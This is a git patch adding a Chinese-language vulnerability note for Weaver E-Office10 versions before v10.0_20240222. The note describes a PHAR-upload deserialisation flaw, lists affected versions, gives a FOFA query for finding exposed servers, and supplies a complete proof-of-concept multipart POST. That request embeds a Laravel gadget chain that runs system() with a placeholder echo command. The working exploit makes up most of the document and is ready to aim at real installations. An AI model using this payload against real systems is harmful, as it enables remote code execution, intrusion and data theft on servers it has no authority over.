From 47b29bab27aa2fbe8a207df7a2d6779e154cbfeb Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Fri, 29 Mar 2024 10:22:46 +0800
Subject: [PATCH] =?UTF-8?q?Create=20=E6=B3=9B=E5=BE=AEE-Office10=E7=89=88?= =?UTF-8?q?=E6=9C=AC=E5=B0=8F=E4=BA=8Ev10.0=5F20240222=E5=AD=98=E5=9C=A8?= =?UTF-8?q?=E8=BF=9C=E7=A8=8B=E4=BB=A3=E7=A0=81=E6=89=A7=E8=A1=8C=E6=BC=8F?= =?UTF-8?q?=E6=B4=9E.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...本小于v10.0_20240222存在远程代码执行漏洞.md | 35 +++++++++++++++++++
1 file changed, 35 insertions(+)
create mode 100644 泛微E-Office10版本小于v10.0_20240222存在远程代码执行漏洞.md
diff --git a/泛微E-Office10版本小于v10.0_20240222存在远程代码执行漏洞.md b/泛微E-Office10版本小于v10.0_20240222存在远程代码执行漏洞.md
new file mode 100644
index 0000000..a762edb
--- /dev/null
+++ b/泛微E-Office10版本小于v10.0_20240222存在远程代码执行漏洞.md
@@ -0,0 +1,35 @@
+## 泛微E-Office10版本小于v10.0_20240222存在远程代码执行漏洞
+
+漏洞的关键在于系统处理上传的PHAR文件时存在缺陷。攻击者能够上传伪装的PHAR文件到服务器,利用PHP处理PHAR文件时自动进行的反序列化机制来触发远程代码执行。
+
+## 影响版本
+```
+v10.0_20180516 < E-Office10 < v10.0_20240222
+```
+
+
+## fofa
+```
+app="泛微-EOffice"
+```
+
+
+## poc
+```
+POST /eoffice10/server/public/api/attachment/atuh-file HTTP/1.1
+Host:
+User-Agent: Go-http-client/1.1
+Content-Length: 523
+Accept: string("*/*")
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data; boundary=ifedjiqy
+
+--ifedjiqy
+Content-Disposition: form-data; name="Filedata"; filename="register.inc"
+Content-Type: image/jpeg
+
+GIF89a
+D.....................O:40:"Illuminate\Broadcasting\PendingBroadcast":2:{s:9:".*.events";O:25:"Illuminate\Bus\Dispatcher":1:{s:16:".*.queueResolver";s:6:"system";}s:8:".*.event";O:38:"Illuminate\Broadcasting\BroadcastEvent":1:{s:10:"connection";s:37:"echo 9yM86ESyFBXNDwCh6Nbsxy9wrcQrP25P";}}....test.txt....K..f.....~..........test.).i..f3....2pq....>....GBMB
+--ifedjiqy--
+```
+